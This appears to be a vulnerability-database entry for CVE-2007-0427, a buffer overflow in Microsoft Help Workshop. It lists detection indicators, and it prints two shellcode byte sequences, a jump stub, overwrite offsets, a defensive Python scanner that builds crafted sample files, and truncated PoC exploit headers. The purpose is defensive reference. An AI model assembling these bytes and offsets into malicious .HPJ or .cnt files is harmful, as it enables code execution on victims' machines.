CVE-2007-0427
Published: 2007-01-23
Priority P3 · 47 · critical · 9.3 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit: public PoC available (see the Exploit-DB entries below)
EPSS: 30.96% (98.0th percentile)
Stack-based buffer overflow in Microsoft Help Workshop 4.03.0002 allows user-assisted remote attackers to execute arbitrary code via a help project (.HPJ) file with a long HLP field in the OPTIONS section.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | html_help_workshop | — | — |
Detection & IOCs (extracted from sources)
Shellcode bytes, variant A:
66 83 c4 10 8b c4 66 81 ec 10 21 50 66 2d 11 11 50 b8 7a 6b 3f 79 ff d0 58 50 80 38 20 74 49 5b 53 33 c0 b0 ff 50 66 81 eb 11 05 53 b8 23 2d 3f 79 3c ff 75 02 32 c0 ff d0 58 50 66 2d 11 05 32 db 38 18 74 03 40 eb f9 5b 53 32 d2 b1 5c 88 08 40 38 13 74 08 8a 0b 88 08 43 40 eb f4 32 d2 88 10 58 50 66 2d 11 05 48 40 8b d0 58 50 66 2d 11 11 50 33 c9 51 51 51 51 51 51 51 52 b8 10 50 3f 79 ff d0 33 c0 50 b8 da 69 3f 79 ff d0
Shellcode bytes, variant B:
66 83 c4 10 8b c4 66 81 ec 10 21 50 66 2d 11 11 50 b8 7a 6b 3f 79 ff d0 58 50 80 38 20 74 49 5b 53 33 c0 b0 ff 50 66 81 eb 11 05 53 b8 23 2d 3f 79 3c ff 75 02 32 c0 ff d0 58 50 66 2d 11 05 32 db 38 18 74 03 40 eb f9 5b 53 b2 01 b1 5c 88 08 40 38 13 74 08 8a 0b 88 08 43 40 eb f4 b2 01 88 10 58 50 66 2d 11 05 48 40 8b d0 80 38 01 74 03 40 eb f8 32 c9 88 08 58 50 66 2d 11 11 50 33 c9 51 51 51 51 51 51 51 52 b8 10 50 3f 79 ff d0 33 c0 50 b8 da 69 3f 79 ff d0
Jump stub bytes (E9 = jmp rel32; the displacement 0xfffffe1b is negative, so this jumps back into the buffer):
e9 1b fe ff ff
- The stack-based buffer overflow is triggered by a long HLP field value in the [OPTIONS] section of a .HPJ project file opened in Microsoft Help Workshop 4.03.0002.
- The exploit .cnt file payload begins with the ASCII string "0 Microsoft Help Workshop PoC exploit by porkythepig" followed immediately by shellcode; detect this pattern in .cnt files.
- The exploit .HPJ file payload begins with ";Microsoft Help Workshop PoC exploit by porkythepig" followed by [OPTIONS] and HLP= with embedded shellcode; detect oversized HLP= values in .HPJ files.
- The .cnt exploit buffer is exactly 619 bytes and the .HPJ exploit buffer is exactly 671 bytes; crafted files of these exact lengths targeting Help Workshop should be flagged.
- The return address overwrite in the .cnt exploit occurs at offset 0x210 (528 bytes) into the buffer; monitor for EIP control at this offset when parsing .cnt files.
- The return address overwrite in the .HPJ exploit occurs at offset 0x14e (334 bytes) into the buffer; monitor for EIP control at this offset when parsing .HPJ files.
- Note: the exploit provides five OS-specific API pointer sets (osApiPtrs); the JMP ESP gadget addresses and API addresses vary per OS version. Detection based on hardcoded return addresses will only cover the specific OS variants targeted by this PoC.
- Note: the vulnerability is "user-assisted": the victim must open a malicious .HPJ or .cnt file in Microsoft Help Workshop, so exploitation requires social engineering.
- Note: Microsoft Help Workshop 4.03.0002 is a standard component of MS Visual Studio 6.0 and 2003 (.NET); affected systems are those with these Visual Studio versions installed.
No detection rules found.
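Since no detection rule is indexed, the following is an added example of a heuristic scanner built from the IOCs above; it is not part of this page and not porkythepig's PoC code. The two shellcode sequences, the jump stub, the marker strings and the 619/671-byte sizes are taken from the IOC list. MAX_FIELD_LEN (260, MAX_PATH) is an assumed threshold, chosen because HLP= names an output file and a .cnt line names a topic, so anything longer than a path is suspect; the benign and crafted sample files are constructed here. The scanner deliberately generalizes beyond the PoC: an attacker can trivially change the marker string, the padding length or the return address, so the oversized-field check and the shellcode-prefix match do the real work, while the exact-size and marker matches only confirm the unmodified PoC.

```python
"""Heuristic scanner for crafted Help Workshop .HPJ / .cnt files (added example,
built from the IOCs on this page; not the PoC author's code)."""
import struct

# The two shellcode byte sequences and the jump stub listed in the IOCs above.
SHELLCODE_VARIANTS = [bytes.fromhex(h) for h in (
    "66 83 c4 10 8b c4 66 81 ec 10 21 50 66 2d 11 11 50 b8 7a 6b 3f 79 ff d0 58 50 80 38 20 74 "
    "49 5b 53 33 c0 b0 ff 50 66 81 eb 11 05 53 b8 23 2d 3f 79 3c ff 75 02 32 c0 ff d0 58 50 66 "
    "2d 11 05 32 db 38 18 74 03 40 eb f9 5b 53 32 d2 b1 5c 88 08 40 38 13 74 08 8a 0b 88 08 43 "
    "40 eb f4 32 d2 88 10 58 50 66 2d 11 05 48 40 8b d0 58 50 66 2d 11 11 50 33 c9 51 51 51 51 "
    "51 51 51 52 b8 10 50 3f 79 ff d0 33 c0 50 b8 da 69 3f 79 ff d0",
    "66 83 c4 10 8b c4 66 81 ec 10 21 50 66 2d 11 11 50 b8 7a 6b 3f 79 ff d0 58 50 80 38 20 74 "
    "49 5b 53 33 c0 b0 ff 50 66 81 eb 11 05 53 b8 23 2d 3f 79 3c ff 75 02 32 c0 ff d0 58 50 66 "
    "2d 11 05 32 db 38 18 74 03 40 eb f9 5b 53 b2 01 b1 5c 88 08 40 38 13 74 08 8a 0b 88 08 43 "
    "40 eb f4 b2 01 88 10 58 50 66 2d 11 05 48 40 8b d0 80 38 01 74 03 40 eb f8 32 c9 88 08 58 "
    "50 66 2d 11 11 50 33 c9 51 51 51 51 51 51 51 52 b8 10 50 3f 79 ff d0 33 c0 50 b8 da 69 3f "
    "79 ff d0",
)]
# First 24 bytes shared by both variants, up to the first API call:
# add sp,0x10 / mov eax,esp / sub sp,0x2110 / push eax / sub ax,0x1111 / push eax /
# mov eax,0x793f6b7a / call eax
SHELLCODE_PREFIX = SHELLCODE_VARIANTS[0][:24]
JMP_BACK = bytes.fromhex("e9 1b fe ff ff")           # jmp rel32 stub listed as an IOC
HPJ_MARKER = b";Microsoft Help Workshop PoC exploit by porkythepig"
CNT_MARKER = b"0 Microsoft Help Workshop PoC exploit by porkythepig"
HPJ_POC_SIZE, CNT_POC_SIZE = 671, 619                # exact PoC file sizes from the page
# Assumed threshold (not from the page): HLP= names the output .hlp file and a .cnt
# line is "<level> <title>=<topic>", so anything longer than MAX_PATH is suspect.
MAX_FIELD_LEN = 260


def decode_jmp_rel32(code: bytes) -> int:
    """Signed displacement of an E9 jmp rel32 (relative to the end of the 5-byte instruction)."""
    if len(code) < 5 or code[0] != 0xE9:
        raise ValueError("not a jmp rel32")
    return struct.unpack("<i", code[1:5])[0]


def scan_shellcode(data: bytes) -> list:
    """Flag the PoC shellcode (an exact variant, else its shared prefix) and the jmp-back stub."""
    hits = []
    if any(v in data for v in SHELLCODE_VARIANTS):
        hits.append("shellcode-exact")
    elif SHELLCODE_PREFIX in data:
        hits.append("shellcode-prefix")
    if JMP_BACK in data:
        hits.append("jmp-back")
    return hits


def parse_hpj_options(data: bytes) -> dict:
    """Minimal INI-style parse of the [OPTIONS] section of an .HPJ project file."""
    options, in_options = {}, False
    for raw in data.splitlines():                    # bytes.splitlines: \n and \r only
        line = raw.strip()
        if not line or line.startswith(b";"):        # ';' starts a comment line
            continue
        if line.startswith(b"[") and line.endswith(b"]"):
            in_options = line[1:-1].strip().upper() == b"OPTIONS"
            continue
        if in_options and b"=" in line:
            key, _, value = line.partition(b"=")
            options[key.strip().upper()] = value.strip()
    return options


def scan_hpj(data: bytes) -> list:
    """Heuristics for a crafted .HPJ: PoC marker, oversized HLP=, PoC size, shellcode."""
    hits = []
    if data.startswith(HPJ_MARKER):
        hits.append("hpj-poc-marker")
    hlp = parse_hpj_options(data).get(b"HLP")
    if hlp is not None and len(hlp) > MAX_FIELD_LEN:
        hits.append("hpj-oversized-hlp:%d" % len(hlp))
    if len(data) == HPJ_POC_SIZE:
        hits.append("hpj-poc-size")
    return hits + scan_shellcode(data)


def scan_cnt(data: bytes) -> list:
    """Heuristics for a crafted .cnt: PoC marker, any over-long line, PoC size, shellcode."""
    hits = []
    if data.startswith(CNT_MARKER):
        hits.append("cnt-poc-marker")
    longest = max((len(line) for line in data.splitlines()), default=0)
    if longest > MAX_FIELD_LEN:
        hits.append("cnt-oversized-line:%d" % longest)
    if len(data) == CNT_POC_SIZE:
        hits.append("cnt-poc-size")
    return hits + scan_shellcode(data)


# Constructed samples (not real exploit files): a benign project and content file, and
# stand-ins laid out like the PoCs, with 'BBBB' where the return address would sit.
BENIGN_HPJ = b"[OPTIONS]\r\nHLP=help\\myapp.hlp\r\nTITLE=My App Help\r\n[FILES]\r\nmyapp.rtf\r\n"
BENIGN_CNT = b":Base myapp.hlp\r\n1 Overview=IDH_OVERVIEW\r\n"
SAMPLE_HPJ = (HPJ_MARKER + b"\r\n[OPTIONS]\r\nHLP=" + b"A" * 0x14E + b"BBBB"
              + JMP_BACK + SHELLCODE_VARIANTS[1] + b"\r\n")
SAMPLE_CNT = (CNT_MARKER + b"A" * (0x210 - len(CNT_MARKER)) + b"BBBB"
              + JMP_BACK + SHELLCODE_PREFIX + b"\r\n1 Title=topic\r\n")

if __name__ == "__main__":
    for name, hits in (("benign.hpj", scan_hpj(BENIGN_HPJ)), ("benign.cnt", scan_cnt(BENIGN_CNT)),
                       ("sample.hpj", scan_hpj(SAMPLE_HPJ)), ("sample.cnt", scan_cnt(SAMPLE_CNT))):
        print("%-10s %s" % (name, hits or "clean"))
    print("jmp-back displacement: %#x" % decode_jmp_rel32(JMP_BACK))
```

The offsets on the page (0x210 for .cnt, 0x14e for .HPJ) say where EIP is overwritten in the PoC, which helps when reproducing the crash under a debugger, but a file scanner cannot observe EIP control, so the example treats any over-long HLP= value or .cnt line as the trigger condition instead. decode_jmp_rel32 recovers the displacement of the e9 1b fe ff ff stub (-0x1E5, i.e. 485 bytes back from the end of the instruction), which is consistent with a stub placed after the return address that jumps back toward the shellcode following the marker string at the start of the buffer.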
Exploit-DB · 2007-01-19
Microsoft Help Workshop 4.03.0002 - '.HPJ' Local Buffer Overflow (CVE-2007-0427)
---
```cpp
//*****************
//
// PoC exploit for .HPJ project files buffer overflow vulnerability in
// Microsoft Help Workshop v4.03.0002
// The tool is standard component of MS Visual Studio v6.0 and 2003 (.NET)
//
// vulnerability found / exploit built by porkythepig
//
//*****************
#include "stdio.h"
#include "stdlib.h"
#include "string.h"
#include "memory.h"
// Comments on the #defines below are inferred from the macro names.
#define STR01 "Microsoft Help Workshop PoC exploit by porkythepig"
#define DEF_SPAWNED_PROCESS "notepad.exe"   // process the shellcode launches
#define EXPL_SIZE 671                       // total size of the generated .HPJ payload
#define PROC_NAM_SIZ 128                    // room reserved for the process name
#define RET_OFFSET 0x14e                    // offset of the return-address overwrite
#define PROC_NAME_OFFSET 0x166              // offset where the process name is stored
// Offsets at which the per-OS API addresses are patched into the shellcode
// (ExitProcess, GetStartupInfo, CreateProcess, GetWindowsDirectory)
#define EXPRO_OFFSET 0xd9
#define GETSTAR_OFFSET 0x58
#define CREPRO_OFFSET 0xcf
#define GETWINDIR_OFFSET 0x73
typedef struct
{
unsigned int extPro;
```
Listing truncated in the indexed excerpt.
Exploit-DB · 2007-01-17
Microsoft Help Workshop 4.03.0002 - '.cnt' Local Buffer Overflow (CVE-2007-0427)
---
```cpp
//*****************
//
// PoC exploit for .cnt files buffer overflow vulnerability in
// Microsoft Help Workshop v4.03.0002
// The tool is standard component of MS Visual Studio v6.0, 2003 (.NET)
//
// vulnerability found / exploit built by porkythepig
//
//*****************
#include "stdio.h"
#include "stdlib.h"
#include "string.h"
#include "memory.h"
// Comments on the #defines below are inferred from the macro names.
#define STR01 "0 Microsoft Help Workshop PoC exploit by porkythepig "
#define DEF_SPAWNED_PROCESS "notepad.exe"   // process the shellcode launches
#define EXPL_SIZE 619                       // total size of the generated .cnt payload
#define PROC_NAM_SIZ 66                     // room reserved for the process name
#define RET_OFFSET 0x210                    // offset of the return-address overwrite
#define PROC_NAME_OFFSET 0x228              // offset where the process name is stored
#define BACK_SEQ_OFFSET 0x218               // offset of the backward-jump sequence after the return address
// Offsets at which the per-OS API addresses are patched into the shellcode
// (ExitProcess, GetStartupInfo, CreateProcess, GetWindowsDirectory)
#define EXPRO_OFFSET 0xbf
#define GETSTAR_OFFSET 0x4a
#define CREPRO_OFFSET 0xb5
#define GETWINDIR_OFFSET 0x65
typedef struct
{
```
Listing truncated in the indexed excerpt.
No writeups or analysis indexed.
References
- http://osvdb.org/31899
- http://secunia.com/advisories/23862
- http://securityreason.com/securityalert/2177
- http://www.anspi.pl/~porkythepig/visualization/hpj-x01.cpp
- http://www.securityfocus.com/archive/1/457436/100/0/threaded
- http://www.securityfocus.com/bid/22135